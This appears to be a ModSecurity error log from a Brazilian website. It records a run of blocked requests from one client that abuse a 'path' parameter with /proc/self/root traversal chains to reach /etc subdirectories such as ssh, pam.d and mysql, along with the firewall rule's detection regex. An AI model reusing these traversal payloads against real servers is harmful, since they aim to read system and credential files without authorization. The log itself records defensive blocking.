https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:16.630263 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.243.128:60100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q2Lninkcc-iUj5ApKeQAAA4I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:17.768220 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:60108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q2V1pVZ5mVmJwsFMb8gAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:20.168233 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:60116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q3PHIg5MgXLBnicPlvwAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:21.547210 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.243.128:53346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q3bninkcc-iUj5ApKhwAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:22.803031 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:53358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q3jJ3M9BSuKP7CAYDnwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:24.171741 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:53362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q4BCii7xarUs8iHZUGAAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:25.507741 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.243.128:53370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q4TJ3M9BSuKP7CAYDogAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:26.827704 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:53384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q4hCii7xarUs8iHZUHgAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:28.112546 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:53392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q5Lninkcc-iUj5ApKlgAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:29.406860 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:54684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q5fXLqtnMIWvjpaKGcQAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:30.738362 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:54696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q5hCii7xarUs8iHZUJQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:31.899089 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.243.128:54698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q5_HIg5MgXLBnicPlxAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:33.093114 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:54708] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q6da6ubjKNq_cu4a-cAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:34.407382 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:54712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q6jJ3M9BSuKP7CAYDqQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:35.736816 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:54724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q6-oXxyEfFpUF8f9uDwAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:37.054546 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:54734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q7V1pVZ5mVmJwsFMb-QAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:39.371595 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:54740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q7_XLqtnMIWvjpaKGegAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:41.374189 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:37248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q8PqxLDW4GITHUkTRigAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:42.900652 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:37250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q8uoXxyEfFpUF8f9uEAAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:44.200036 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:37256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q9Na6ubjKNq_cu4a-eQAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:45.490715 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:37272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q9da6ubjKNq_cu4a-fAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:18:46.662985 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:37280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Q9vqxLDW4GITHUkTRjQAAAQY"], referer: 